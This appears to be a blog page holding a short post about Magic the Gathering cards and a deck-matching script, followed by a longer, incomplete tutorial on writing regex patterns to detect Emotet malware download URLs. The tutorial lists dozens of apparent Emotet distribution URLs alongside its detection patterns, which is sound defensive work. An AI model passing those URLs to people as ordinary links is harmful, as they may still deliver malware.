/* CAT(1) */

When Magic the Gathering (MtG) came out I was beyond excited. As a fairly young kid, this was unlike anything I'd ever seen before and for a few years I would spend every penny from chores, lunch money, and birthday cards to round out my collection. It was a blast, I really enjoyed it, and developed many fond memories around playing and collecting the cards.

Alas, as with all good things, that came to an end as life started to kick in. Fast forward 20+ years to today and I'm free to indulge myself in my old(new) hobbies again. One thing I always wanted to do was buy a booster box. SO.MANY.CARDS! But holy shit is it not cheap, or at least not for past-me, so it was always a pipe dream until now.

I've been shitposting with friends at work about doing a MtG draft at a conference we'll be attending one night, rehashing old memories, and then I felt a familiar feeling...an itch that needed to be scratched. I read up on the latest Amonkhet set and fell in love with the theme of it so I went out and bought an Amonkhet Booster Box, the Amonkhet Deck Builder's Toolkit, and an Amonkhet Bundle Box. Indulge I shall.

It's a metric crap top of cards, espceially going from 0, and I found myself with an overwhelming amount of information to take in and try to process. Tons of new rules, new abilities, new everything. I spent the majority of time looking up card rules to try and get a grasp of the game, not even knowing where to begin with building a new deck. I cobbled together some decks as I opened packs but I wondered if, within my cache of newfound cards, there may already be a deck someone else has built and posted online. Surely that would be the case with 1,100 cards, right?

TL;DR don't buy packs and expect to have any semblance of a pre-constructed deck, official or otherwise.

To come to this conclusion, which I admittedly already thought may be the case before buying all of these (still didn't deter me from making the purchase though, at least to do it once) I created a script to essentially search decks I scrape online and attempt to match my library against. The script mtgdeckhunter.py is up on Github with usage examples and output data. You can skip everything below if you're just interested in that instead of my rambling about it.

After some time on the net looking up new MtG rules, I came across three main sites (Deckbox, MtG Goldfish, and MtG Top 8) that had tons of decks available to peruse in all kinds of formats. The problem then became not finding the decks, but identifying which decks I might have most of the cards for. The idea being I could then just craft some decks other people put thought into, give them a whirl, see if I liked that style, then maybe go from there. Unfortunately none of these sites have that feature available except for MtG Goldfish - part of their monthly pay service.

I decided I'd try to craft something simple in Python to scrape the publicly available decks and see if I had any matches. What I've now realized is that if you just have one "set" (eg Amonkhet) then you're pretty much SoL on finding pre-made decks. Since there are so many editions in rotation, you rarely find real decks solely focused on just one set except the officially released ones. In hindsight, I'd have bought a few of the "Deck Builder's Toolkits" and Bundle Boxes for maybe the most recent 2-3 sets or just a couple of the official pre-constructed ones that actually don't seem too bad. Initially the idea of buying a pre-constructed deck had me sticking my nose up as if I'm some kind of MtG legend (I'm not).

Anywho, I'm not providing the decks I've pulled from these sites, that is an exercise left to the user, but if you have a ton of cards that you've got listed out on your computer, then maybe this program will prove helpful to you. I ended up not really using it at all...go figure...and built two EDH decks that have been pretty fun in my limited playing. I may revisit this once I have a more well rounded collection.

You can see my cards from the three purchases mentioned previously on Deckbox or in text format here, if you're interested in what I got. Deckbox says the total value of cards in the set is $283.95, which I think is pretty good since it's about 2x what I paid (doesn't account for the foils I got). The new formats (eg EDH) seem really fun and I'm excited to get back into this hobby.


*NOTE: I likely won't be updating this code anytime soon for the reasons above. It's probably quite a bit buggy and after having collected 100,000+ decks, I quickly recognized using JSON as the storage format as being a terrible idea (80MB+ file). Also I'd say it's not particularly stable as it relies upon parsing these sites which can change their code at any moment.

Regular expressions (regex) are a language construct that allow you to define a search pattern. The flexibility of this language allows you to craft search patterns for tons of practical applications, including passive identification of network traffic. Specifically, they can allow you to pattern match on URL's so that you may quickly identify malicious sites frequently used by malware command and control (C2), domain generation algorithms (DGA's), and other such activities.

I fell in love with using regex as a defensive tool while doing incident response many years ago. The depth of control they provide naturally lends itself to the forensic, analyst, and responder lines of work. This blog may be old hat to most blue teamers out there, but if not, hopefully it serves as an educational resource on how you can use data to build PCRE's for network defense.

Over the course of this blog, I'll cover developing Perl compatible regex (PCRE) for the Emotet banking malware download URL's and develop PCRE's that encompass multiple campaigns that can then be used on a proxy device (blocking), in a SIEM (identification), or whatever system you have that supports utilizing these expressions. Emotet is a great candidate for review as it has varying domain structures that are ripe for pattern matching. I'll walk you through how I develop these PCRE's, along with refining them, and then finally how they can be vetted for false-positives (FP) to make them ready for production.

Throughout the blog, I'll be using a Python script I wrote called pcre_check to assit with the analysis. Essentially, all the tool does is take a parameter for a file containing your PCRE's, a parameter for a file containing the URL's, and then some flags for how to display the pattern matches and misses. This is helpful for the rapid development of PCRE's because, more often than naught, you find yourself in the midst of developing these when the shit has hit the fan...or at least I always did.

I'll be focusing solely on URL's in this example; however, on the off chance you're not familiar with regex, keep in mind that a myriad of tools, all the way down at the byte level and up to the application level that I'll be covering here can utilize regex. You should absolutely learn the basics at least as it's something that can be a life saver in your daily toolbox.

Before I get too much further in, here are a couple of helpful links, that I find myself constantly visiting, which you may find useful if you want to review or build your own PCRE's. I'll try to explain the regex syntax and logic as I go but I'll assume you know the basic structure of the language. If not, hit the references below.

This will be a long blog, and a little free flowing, as I develop these while enumerating step-by-step. Below are some jumps so you can skip around as needed.

Initial Sample Corpus

The Emotet banking malware download locations have a lot of different URL structures across their different campaigns. It's been popping up on my radar more and more lately so I want to try and enumerate the patterns here to further expand what I can catch. That being said, the very first thing I need to do is collect a decent samples of the various campaigns so that I can begin to try and match them. Prior to my current $dayjob, I'd approach this by hitting up multiple blogs from researchers or security companies and compile the URL set. When I didn't have access to systems that made this task fairly trivial, I would frequently build them from the below resources.

Usually just Googling the threat name, "Emotet domains", bring you to sites like this one which have links to Pastebin posts containing loads of samples. The more the better but in general, in my experience, I'd say between 15-30 URL's is usually enough to make a solid base for an individual pattern and then you can tweak it during the false-positive (FP) checking phase.

I've placed 696 Emotet URL's on Github which you can use to follow along or throw in a blocklist.

Pattern Recognition / Enumeration

Once you have a decent sample set, the next step is to analyze the data and look for patterns. I'll show the various changes to the PCRE's as I analyze the URL's and you can see how they evolve into the final product after each iteration. To better illustrate this, I'll just focus on the last 20 URL's at a time but normally I'll have open 3 terminals: top window editing the URL file, middle window with pcre_check output, bottom window editing the PCRE file. This layout allows me to quickly modify and validate changes on the fly and significantly reducing the time to turnaround.

Below is the first run of the script showing that none of the URLs matched and truncated to the last 20.

Round 1

$ python pcre_check.py -p emotet_pcres -u emotet_urls -n [+] NO HITS [+] http://12back.com/dw3wz-ue164-qqv/ http://4glory.net/p7lrq-s191-iv/ ... http://www.melodywriters.com/INVOICE-864339-98261/ http://www.prodzakaz.com.ua/H27560xzwsS/ http://www.stellaimpianti.it/download2467/ http://www.stepstonedev.com/field/download7812/ http://www.surreycountycleaners.com/t5wx-x064-mzdb/ http://www.voloskof.net/Sn83160EngQs/ http://www.wildweek.com/EDHFR-08-77623-document-May-04-2017/ http://www.ziyufang.studio/project/wp-content/plugins/nprojects/download5337/ http://wyskocil.de/ORDER-525808-73297/ http://xionglutions.com/NDKBS-51-84402-document-May-03-2017/ http://xionglutions.com/wl7dh-uf201-asnw/ http://xyphoid.com/RRT-13279129.dokument/ http://xyphoid.com/SCANNED/MM3431UCNPCEZRO/ http://yildiriminsaat.com.tr/JCV-71815736.dokument/ http://zahahadidmiami.com/K38258Q/ http://zeroneed.com/FNN-40446899.dokument/ http://ziarahsutera.com/5377959590/ http://zonasacra.com/zH83293YizhQ/ http://zvarga.com/15-12-07/CUST-9405847-8348/ http://zypern-aktiv.de/wp-content/plugins/wordfence/img9re-a789-stz/

There are a couple of things that jump out immediately on the first review.

For each of the PCRE, I've grown accustomed to starting them with the below structure.


This matches any line that begins ("^") with "http://" followed by any characters, except ("[^ ]") forward slash ("\x2F"), up to the first foward slash. This ensures we match the domain regardless of what TLD or subdomains may be present.

For ease of illustration, I'm going to group the variations and break them down individually.

[Group 01]

http://www.surreycountycleaners.com/t5wx-x064-mzdb/ http://xionglutions.com/wl7dh-uf201-asnw/ http://zypern-aktiv.de/wp-content/plugins/wordfence/img9re-a789-stz/

For this pattern, we have 4-5 alpha(lower)numeric, dash, 4-5 alpha(lower)numeric, dash, 3-4 alpha(lower). We'll also want to account for the last line which has the path multiple levels in. We can accomplish this by putting our "[^\x2F]+\/" section in a group and saying the group can repeat one or more times (eg match everything between the forward slashes until the last one, where our pattern is).


[Group 02]

http://www.melodywriters.com/INVOICE-864339-98261/ http://wyskocil.de/ORDER-525808-73297/ http://zvarga.com/15-12-07/CUST-9405847-8348/

This next group appears to use a word in caps, dash, 6-7 numbers, dash, 4-5 numbers. We'll need to account for the subpaths again as well. In this case, I prefer to group full words instead of using a character range, which helps for trying to be false-positive adverse.


[Group 03]

http://www.prodzakaz.com.ua/H27560xzwsS/ http://www.voloskof.net/Sn83160EngQs/ http://xyphoid.com/SCANNED/MM3431UCNPCEZRO/ http://zahahadidmiami.com/K38258Q/ http://ziarahsutera.com/5377959590/ http://zonasacra.com/zH83293YizhQ/

I feel this group may end up getting split later. We have one URL which is purely numerical and then two which have no lowercase letters. We'll cross that bridge as we look at more samples, if necessary. Another thing to note is that this group has a very weak pattern in that it is very generic, which means it will likely match a lot of legitimate URL's and not hold up during FP testing. We'll cross that bridge when we get to it as well.

For now, it's a mix of 7-15 alphanumeric characters.


[Group 04]

http://xyphoid.com/RRT-13279129.dokument/ http://yildiriminsaat.com.tr/JCV-71815736.dokument/ http://zeroneed.com/FNN-40446899.dokument/

This one, and the next three, all look pretty straight forward: 3 alpha(upper), dash, 8 numbers, period, "dokument" string.


[Group 05]

http://www.wildweek.com/EDHFR-08-77623-document-May-04-2017/ http://xionglutions.com/NDKBS-51-84402-document-May-03-2017/

Similarly, very structured (which is good for us): 5 alpha(upper), dash, 2 numbers, dash, 5 numbers, dash, "document" string, dash, "May" string, dash, 2 numbers, dash, "2017" string. I've defaulted to using "2017" as a string since it aligns with their usage of it as a date so it seems unlikely to change.


[Group 06]

http://www.stellaimpianti.it/download2467/ http://www.stepstonedev.com/field/download7812/ http://www.ziyufang.studio/project/wp-content/plugins/nprojects/download5337/

The string "download", 4 numbers.


I'll throw these into the emotet_pcres file and see how each performs against our target data set of known-bad Emotet sites.

[+] FOUND [+] Count: 24/696 Comment: Group 01 - [ t5wx-x064-mzdb ] PCRE: ^http:\/\/([^\x2F]+\/)+[a-z0-9]{4,5}-[a-z0-9]{4,5}-[a-z]{3,4}\/$ [+] FOUND [+] Count: 43/696 Comment: Group 02 - [ INVOICE-864339-98261 ] PCRE: ^http:\/\/([^\x2F]+\/)+(INVOICE|ORDER|CUST)-[0-9]{6,7}-[0-9]{4,5}\/$ [+] FOUND [+] Count: 177/696 Comment: Group 03 - [ H27560xzwsS ] PCRE: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{7,15}\/$ [+] FOUND [+] Count: 30/696 Comment: Group 04 - [ RRT-13279129.dokument ] PCRE: ^http:\/\/([^\x2F]+\/)+[A-Z]{3}-[0-9]{8}\.dokument\/$ [+] FOUND [+] Count: 24/696 Comment: Group 05 - [ EDHFR-08-77623-document-May-04-2017 ] PCRE: ^http:\/\/([^\x2F]+\/)+[A-Z]{5}-[0-9]{2}-[0-9]{5}-document-May-[0-9]{2}-2017\/$ [+] FOUND [+] Count: 62/696 Comment: Group 06 - [ download2467 ] PCRE: ^http:\/\/([^\x2F]+\/)+download[0-9]{4}\/$

Pretty low across the board except for group 3, which is the one I mentioned is too loose to begin with. From here on out, if I don't list a particular group, it implies there was no change to the PCRE.

Round 2

The next 20 URL's are below.

http://web2present.com/Invoice-538878-14610/ http://webbmfg.com/krupy/gallery2/g2data/LUqc663BAyN333-HoO/ http://webbsmail.co.uk/DIDE-19-85247-document-May-04-2017/ http://webergy.co.uk/15-14-47/Cust-0910279-3981/ http://webics.org/Cust-951068-69554/ http://websajt.nu/ap6ohc-au152-urttp/ http://wescographics.com/17-40-07/Invoice-5558936-1201/ http://whiteroofradio.com/YD796MJO974-NNW/ http://wightman.cc/ipa0oab-j490-keap/ http://wilstu.com/hHiDSaaP03Y95TIGpIUS4Aa/ http://wingitproductions.org/NUDA-X-52454-DE/ http://wlrents.com/CUST.-Document-YDI-04-GQ389557/ http://wnyil.org/wnyil_transfer/Ups__com__WebTracking__tracknum__4DFH74180493688150/ORDER.-Document-SY-92-E736730/ http://wolffy.net/17-00-07/Invoice-9545415-1483/ http://wortis.com/CH760Wcv003-Luh/ http://www.anti-corruption.su/Cust-3708876-8210/ http://www.anti-corruption.su/TNO-59-97413-document-May-04-2017/ http://www.babyo.com.mx/Invoice-583156-73417/ http://www.doodle.tj/yW1NZ-sh00-cH/ http://zypern-aktiv.de/wp-content/plugins/wordfence/img9re-a789-stz/

It looks like we have a few new groups as well. I'll attempt to highlight in red the changes to the PCRE's which might make the changes clearer.

[Group 01] - [ t5wx-x064-mzdb ]

http://websajt.nu/ap6ohc-au152-urttp/ http://wightman.cc/ipa0oab-j490-keap/ http://www.doodle.tj/yW1NZ-sh00-cH/ http://zypern-aktiv.de/wp-content/plugins/wordfence/img9re-a789-stz/

You'll note that the third one now introduces capital letters; it's possible this is a separate campaign but I'll circle back to this later during review. The main changes will be the addition of the capital letters and adjustment on the ranges, which will likely be the case for the rest of the groups.

OLD: ^http:\/\/([^\x2F]+\/)+[a-z0-9]{4,5}-[a-z0-9]{4,5}-[a-z]{3,4}\/$ NEW: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{4,7}-[a-z0-9]{4,5}-[a-z]{2,5}\/$

[Group 02] - [ INVOICE-864339-98261 ]

http://web2present.com/Invoice-538878-14610/ http://webergy.co.uk/15-14-47/Cust-0910279-3981/ http://webics.org/Cust-951068-69554/ http://wescographics.com/17-40-07/Invoice-5558936-1201/ http://wolffy.net/17-00-07/Invoice-9545415-1483/ http://www.anti-corruption.su/Cust-3708876-8210/ http://www.babyo.com.mx/Invoice-583156-73417/

New strings "Invoice" and "Cust".

OLD: ^http:\/\/([^\x2F]+\/)+(INVOICE|ORDER|CUST)-[0-9]{6,7}-[0-9]{4,5}\/$ NEW: ^http:\/\/([^\x2F]+\/)+(INVOICE|ORDER|CUST|Invoice|Cust)-[0-9]{6,7}-[0-9]{4,5}\/$

[Group 03] - [ H27560xzwsS ]


Range adjustment (making this one even more useless).

OLD: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{7,15}\/$ NEW: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{7,23}\/$

[Group 05] - [ EDHFR-08-77623-document-May-04-2017 ]

http://webbsmail.co.uk/DIDE-19-85247-document-May-04-2017/ http://www.anti-corruption.su/TNO-59-97413-document-May-04-2017/

Range adjustment.

OLD: ^http:\/\/([^\x2F]+\/)+[A-Z]{5}-[0-9]{2}-[0-9]{5}-document-May-[0-9]{2}-2017\/$ NEW: ^http:\/\/([^\x2F]+\/)+[A-Z]{3,5}-[0-9]{2}-[0-9]{5}-document-May-[0-9]{2}-2017\/$

[Group 07] - [ LUqc663BAyN333-HoO ]

http://webbmfg.com/krupy/gallery2/g2data/LUqc663BAyN333-HoO/ http://whiteroofradio.com/YD796MJO974-NNW/ http://wortis.com/CH760Wcv003-Luh/

This cluser is defined by one dash towards the end: 11-14 alphanumeric, dash, 3 alpha.


[Group 08] - [ NUDA-X-52454-DE ]


Only one sample so I'll match it exactly, 4 alpha(upper), dash, 1 alpha(upper), dash, 5 numbers, dash, 2 alpha(upper).


[Group 09] - [ CUST.-Document-YDI-04-GQ389557 ]

http://wlrents.com/CUST.-Document-YDI-04-GQ389557/ http://wnyil.org/wnyil_transfer/Ups__com__WebTracking__tracknum__4DFH74180493688150/ORDER.-Document-SY-92-E736730/

Similar to Group 2: same word choice, period, dash, "Document" string, dash, 2-3 alpha(upper), dash, 2 numbers, dash, 7-8 alpha(upper)numeric.


Note that the delta in the output after each group is just something I've included after the fact to show the progress for the blog.

[+] FOUND [+] Count: 66/696 (+42) Comment: [Group 01] - [ t5wx-x064-mzdb ] PCRE: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{4,7}-[a-z0-9]{4,5}-[a-z]{2,5}\/$ [+] FOUND [+] Count: 80/696 (+37) Comment: [Group 02] - [ INVOICE-864339-98261 ] PCRE: ^http:\/\/([^\x2F]+\/)+(INVOICE|ORDER|CUST|Invoice|Cust)-[0-9]{6,7}-[0-9]{4,5}\/$ [+] FOUND [+] Count: 190/696 (+13) Comment: [Group 03] - [ H27560xzwsS ] PCRE: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{7,23}\/$ [+] FOUND [+] Count: 30/696 Comment: [Group 04] - [ RRT-13279129.dokument ] PCRE: ^http:\/\/([^\x2F]+\/)+[A-Z]{3}-[0-9]{8}\.dokument\/$ [+] FOUND [+] Count: 59/696 (+35) Comment: [Group 05] - [ EDHFR-08-77623-document-May-04-2017 ] PCRE: ^http:\/\/([^\x2F]+\/)+[A-Z]{3,5}-[0-9]{2}-[0-9]{5}-document-May-[0-9]{2}-2017\/$ [+] FOUND [+] Count: 62/696 Comment: [Group 06] - [ download2467 ] PCRE: ^http:\/\/([^\x2F]+\/)+download[0-9]{4}\/$ [+] FOUND [+] Count: 15/696 Comment: [Group 07] - [ LUqc663BAyN333-HoO ] PCRE: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{11,14}-[a-zA-Z]{3}\/$ [+] FOUND [+] Count: 3/696 Comment: [Group 08] - [ NUDA-X-52454-DE ] PCRE: ^http:\/\/([^\x2F]+\/)+[A-Z]{4}-[A-Z]{1}-[0-9]{5}-[A-Z]{2}\/$ [+] FOUND [+] Count: 20/696 Comment: [Group 09] - [ CUST.-Document-YDI-04-GQ389557 ] PCRE: ^http:\/\/([^\x2F]+\/)+(CUST|ORDER)\.-Document-[A-Z]{2,3}-[0-9]{2}-[A-Z0-9]{7,8}\/$

Round 3

The next set of 20 URL's.

http://theocforrent.com/BG-47535325/zp3x-r88-wuh.view/ http://thepogs.net/rs4eG-Md93-FSZV/ http://thesubservice.com/ORDER.-Document-9543529814/ http://theuntoldsorrow.co.uk/ORDER.-XI-80-UY913942/ http://tiger12.com/TGA-48-76252-doc-May-04-2017/ http://timmadden.com.au/qzw1s-wc740-m/ http://toppprogramming.com/Cust-8328499631/ http://tpsystem.net/TaVS391hyCaD623-dJ/ http://transfinity.co.uk/sam/fathers-day/htdocs/b2m-qp699-jxmln/ http://tridentii.com/OY-30676027.dokument/ http://tscoaching.co.uk/l1R-q60-pe/ http://uncover.jp/XwXL806QaDN792-jr/ http://uncover.jp/r-2psl-vo440-lz.doc/ http://visionsoflightphotography.com/FRMLW-RNT-41482-DE/ http://visuals.com/CUST.-VT-38-RH422386/ http://voxellab.com/BBM-07-75350-doc-May-04-2017/ http://vspacecreative.co.uk/O2-view-report-818/c1o-jn07-er.view/ http://wayanad.net/xhW017TRfP646-z/ http://wb0rur.com/ZGAG-59-63863-doc-May-05-2017/ http://www.doodle.tj/yW1NZ-sh00-cH/

One new variant in this set.

[Group 01] - [ t5wx-x064-mzdb ]

http://thepogs.net/rs4eG-Md93-FSZV/ http://timmadden.com.au/qzw1s-wc740-m/ http://transfinity.co.uk/sam/fathers-day/htdocs/b2m-qp699-jxmln/ http://tscoaching.co.uk/l1R-q60-pe/ http://www.doodle.tj/yW1NZ-sh00-cH/

Range adjustment and additiona case changes.

OLD: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{4,7}-[a-z0-9]{4,5}-[a-z]{2,5}\/$ NEW: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{4,7}-[a-zA-Z0-9]{4,5}-[a-zA-Z]{1,5}\/$

[Group 02] - [ INVOICE-864339-98261 ]


This could be a different campaign as it breaks from the double-dashes but it's so similar to group 2 that I'll leave it for now and possibly revisit.

The second dash I'll make optional which should allow the lowest ranges of the numerical sections to match. I'll use an optinal capturing group ("(-)?") for the second dash. Effectively creating a capture group and then using the "?" value after will cause the group to match between zero and one time, thus becoming optional.

OLD: ^http:\/\/([^\x2F]+\/)+(INVOICE|ORDER|CUST|Invoice|Cust)-[0-9]{6,7}-[0-9]{4,5}\/$ NEW: ^http:\/\/([^\x2F]+\/)+(INVOICE|ORDER|CUST|Invoice|Cust)-[0-9]{6,7}(-)?[0-9]{4,5}\/$

[Group 04] - [ RRT-13279129.dokument ]


Range adjustment.

OLD: ^http:\/\/([^\x2F]+\/)+[A-Z]{3}-[0-9]{8}\.dokument\/$ NEW: ^http:\/\/([^\x2F]+\/)+[A-Z]{2,3}-[0-9]{8}\.dokument\/$

[Group 05] - [ EDHFR-08-77623-document-May-04-2017 ]

http://tiger12.com/TGA-48-76252-doc-May-04-2017/ http://voxellab.com/BBM-07-75350-doc-May-04-2017/ http://wb0rur.com/ZGAG-59-63863-doc-May-05-2017/

Add "doc" string to grouping.

OLD: ^http:\/\/([^\x2F]+\/)+[A-Z]{3,5}-[0-9]{2}-[0-9]{5}-document-May-[0-9]{2}-2017\/$ NEW: ^http:\/\/([^\x2F]+\/)+[A-Z]{3,5}-[0-9]{2}-[0-9]{5}-(document|doc)-May-[0-9]{2}-2017\/$

[Group 07] - [ LUqc663BAyN333-HoO ]

http://tpsystem.net/TaVS391hyCaD623-dJ/ http://uncover.jp/XwXL806QaDN792-jr/ http://wayanad.net/xhW017TRfP646-z/

Range adjustment.

OLD: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{11,14}-[a-zA-Z]{3}\/$ NEW: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{11,15}-[a-zA-Z]{1,3}\/$

[Group 08] - [ NUDA-X-52454-DE ]


Range adjustment.

OLD: ^http:\/\/([^\x2F]+\/)+[A-Z]{4}-[A-Z]{1}-[0-9]{5}-[A-Z]{2}\/$ NEW: ^http:\/\/([^\x2F]+\/)+[A-Z]{4,5}-[A-Z]{1,3}-[0-9]{5}-[A-Z]{2}\/$

[Group 09] - [ CUST.-Document-YDI-04-GQ389557 ]

http://thesubservice.com/ORDER.-Document-9543529814/ http://theuntoldsorrow.co.uk/ORDER.-XI-80-UY913942/ http://visuals.com/CUST.-VT-38-RH422386/

Couple of things going on here.

New grouping of words for second part and first entry is only numerical without dashes, which looks similar to the new entry for Group 2. To account for these, I'll use optional capturing groups again to build around them. It makes the rule slightly less accurate but with the other anchors in it, I think it'll still be fairly unique enough to not FP.

NEW: ^http:\/\/([^\x2F]+\/)+(CUST|ORDER)\.-Document-[A-Z]{2,3}-[0-9]{2}-[A-Z0-9]{7,8}\/$ OLD: ^http:\/\/([^\x2F]+\/)+(CUST|ORDER)\.-(Document|XI|VT)((-[A-Z]{2,3})?-[0-9]{2})?-[A-Z0-9]{7,10}\/$

[Group 10] - [ zp3x-r88-wuh.view ]

http://theocforrent.com/BG-47535325/zp3x-r88-wuh.view/ http://uncover.jp/r-2psl-vo440-lz.doc/ http://vspacecreative.co.uk/O2-view-report-818/c1o-jn07-er.view/

The "doc" and "view" ones may be different campaigns but, again, I'll lump them together for now and will separate at the end if necessary: 1-4 alpha(lower)numeric, dash, 3-4 alpha(lower)numeric, dash, optional 5 alpha(lower)numeric, dash, 2-3 alpha(lower), period, group "view" or "doc" strings.


The pcre_check output shows decent coverage improvements.

[+] FOUND [+] Count: 93/696 (+27) Comment: [Group 01] - [ t5wx-x064-mzdb ] PCRE: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{4,7}-[a-zA-Z0-9]{4,5}-[a-zA-Z]{1,5}\/$ [+] FOUND [+] Count: 89/696 (+9) Comment: [Group 02] - [ INVOICE-864339-98261 ] PCRE: ^http:\/\/([^\x2F]+\/)+(INVOICE|ORDER|CUST|Invoice|Cust)-[0-9]{6,7}(-)?[0-9]{4,5}\/$ [+] FOUND [+] Count: 190/696 Comment: [Group 03] - [ H27560xzwsS ] PCRE: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{7,23}\/$ [+] FOUND [+] Count: 56/696 (+26) Comment: [Group 04] - [ RRT-13279129.dokument ] PCRE: ^http:\/\/([^\x2F]+\/)+[A-Z]{2,3}-[0-9]{8}\.dokument\/$ [+] FOUND [+] Count: 79/696 (+20) Comment: [Group 05] - [ EDHFR-08-77623-document-May-04-2017 ] PCRE: ^http:\/\/([^\x2F]+\/)+[A-Z]{3,5}-[0-9]{2}-[0-9]{5}-(document|doc)-May-[0-9]{2}-2017\/$ [+] FOUND [+] Count: 62/696 Comment: [Group 06] - [ download2467 ] PCRE: ^http:\/\/([^\x2F]+\/)+download[0-9]{4}\/$ [+] FOUND [+] Count: 43/696 (+28) Comment: [Group 07] - [ LUqc663BAyN333-HoO ] PCRE: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{11,15}-[a-zA-Z]{1,3}\/$ [+] FOUND [+] Count: 10/696 (+7) Comment: [Group 08] - [ NUDA-X-52454-DE ] PCRE: ^http:\/\/([^\x2F]+\/)+[A-Z]{4,5}-[A-Z]{1,3}-[0-9]{5}-[A-Z]{2}\/$ [+] FOUND [+] Count: 31/696 (+11) Comment: [Group 09] - [ CUST.-Document-YDI-04-GQ389557 ] PCRE: ^http:\/\/([^\x2F]+\/)+(CUST|ORDER)\.-(Document|XI|VT)((-[A-Z]{2,3})?-[0-9]{2})?-[A-Z0-9]{7,10}\/$ [+] FOUND [+] Count: 3/696 Comment: [Group 10] - [ zp3x-r88-wuh.view ] PCRE: ^http:\/\/([^\x2F]+\/)+[a-z0-9]{1,4}-[a-z0-9]{3,4}(-[a-z0-9]{5})?-[a-z]{2,3}\.(view|doc)\/$

Round 4

The next 20 sites.

http://pinoypiper.com/Sz1Mr-H23-Xw/ http://proiecte-pac.ro/ORDER.-5883789520/ http://proprints.dk/Rech-74779857260/ http://pulmad.ee/B6y-Fb95-NMW/ http://redkitecottages.com/Cust-Document-VMH-46-TJ804065/ http://reichertgroup.com/d0r-tl410-cxa/ http://sgbusiness.co.uk/YM-57911235-document-May-03-2017/ http://sign1.no/dhl___status___2668292851/ http://sloan3d.com/Cust-Document-WMV-26-EW054554/ http://stacibockman.com/g2c-o179-pocja/ http://streamingair.com/i0A-St59-m/ http://sublevel3.us/G7n-Gh58-y/ http://superalumnos.net/php/ORDER.-HW-84-Y947883/ http://technetemarketing.com/CUST.-8520279770/ http://teed.ru/YG-47124992/bc7za-l30-v.view/ http://texasbrits.com/m3s-r623-x/ http://thegilbertlawoffice.com/m-9q-d054-gu.doc/ http://thenursesagent.com/ORDER.-9592209302/ http://transfinity.co.uk/sam/fathers-day/htdocs/b2m-qp699-jxmln/ http://tscoaching.co.uk/l1R-q60-pe/

One new variant sticks out, otherwise business as usual.

[Group 01] - [ t5wx-x064-mzdb ]

http://pinoypiper.com/Sz1Mr-H23-Xw/ http://pulmad.ee/B6y-Fb95-NMW/ http://reichertgroup.com/d0r-tl410-cxa/ http://stacibockman.com/g2c-o179-pocja/ http://streamingair.com/i0A-St59-m/ http://sublevel3.us/G7n-Gh58-y/ http://texasbrits.com/m3s-r623-x/ http://transfinity.co.uk/sam/fathers-day/htdocs/b2m-qp699-jxmln/ http://tscoaching.co.uk/l1R-q60-pe/

Half of the 20 are for this group. Just some small range adjustments.

OLD: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{4,7}-[a-zA-Z0-9]{4,5}-[a-zA-Z]{1,5}\/$ NEW: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{3,7}-[a-zA-Z0-9]{3,5}-[a-zA-Z]{1,5}\/$

[Group 02] - [ INVOICE-864339-98261 ]

http://proiecte-pac.ro/ORDER.-5883789520/ http://proprints.dk/Rech-74779857260/ http://technetemarketing.com/CUST.-8520279770/ http://thenursesagent.com/ORDER.-9592209302/

It should be apparent now that Group 2 and 9 have a bit of overlap and I was going to wait till the end to course correct; however, I feel it's just too much at this point so I'm going to split it so the ones above, and previously matched in both groups, with the "ORDER" and "CUST" strings followed by 10 digits are a new unique group. That means I need to edit Group 2 and 9 to avoid these and the simplest way of doing that is removing the previous optional dash, making it absolutely required. See Group 9 and 12 for further iteration details.

OLD: ^http:\/\/([^\x2F]+\/)+(INVOICE|ORDER|CUST|Invoice|Cust)-[0-9]{6,7}(-)?[0-9]{4,5}\/$ NEW: ^http:\/\/([^\x2F]+\/)+(INVOICE|ORDER|CUST|Invoice|Cust)-[0-9]{6,7}-[0-9]{4,5}\/$

[Group 05] - [ EDHFR-08-77623-document-May-04-2017 ]


This new one breaks from the two parts separated by a dash. I can add the dash to the character list and up the range, or I can opt for a optional grouping and up the range. I'm going to do the latter for the reason that it keeps the structure in tact; for this, I'm not as worried about FP's due to the ending part of the pattern being fairly unique.

OLD: ^http:\/\/([^\x2F]+\/)+[A-Z]{3,5}-[0-9]{2}-[0-9]{5}-(document|doc)-May-[0-9]{2}-2017\/$ NEW: ^http:\/\/([^\x2F]+\/)+[A-Z]{2,5}(-[0-9]{2})?-[0-9]{5,10}-(document|doc)-May-[0-9]{2}-2017\/$

[Group 09] - [ CUST.-Document-YDI-04-GQ389557 ]

http://redkitecottages.com/Cust-Document-VMH-46-TJ804065/ http://sloan3d.com/Cust-Document-WMV-26-EW054554/ http://superalumnos.net/php/ORDER.-HW-84-Y947883/

Similar to Group 2, I'm going to reverse course on the optional groupings so that the 10 digits are not captured. To account for the new variants in Group 9, I'm adding an optional grouping for the period after the first word and for the "Document" string, then moving the others back into the A-Z grouping that followed.

OLD: ^http:\/\/([^\x2F]+\/)+(CUST|ORDER)\.-(Document|XI|VT)((-[A-Z]{2,3})?-[0-9]{2})?-[A-Z0-9]{7,10}\/$ NEW: ^http:\/\/([^\x2F]+\/)+(CUST|ORDER|Cust)(.)?(-Document)?-[A-Z]{2,3}-[0-9]{2}-[A-Z0-9]{7,10}\/$

[Group 10] - [ zp3x-r88-wuh.view ]


Range adjustment.

OLD: ^http:\/\/([^\x2F]+\/)+[a-z0-9]{1,4}-[a-z0-9]{3,4}(-[a-z0-9]{5})?-[a-z]{2,3}\.(view|doc)\/$ NEW: ^http:\/\/([^\x2F]+\/)+[a-z0-9]{1,4}-[a-z0-9]{3,4}(-[a-z0-9]{4,5})?-[a-z]{2,3}\.(view|doc)\/$

[Group 11] - [ dhl___status___2668292851 ]


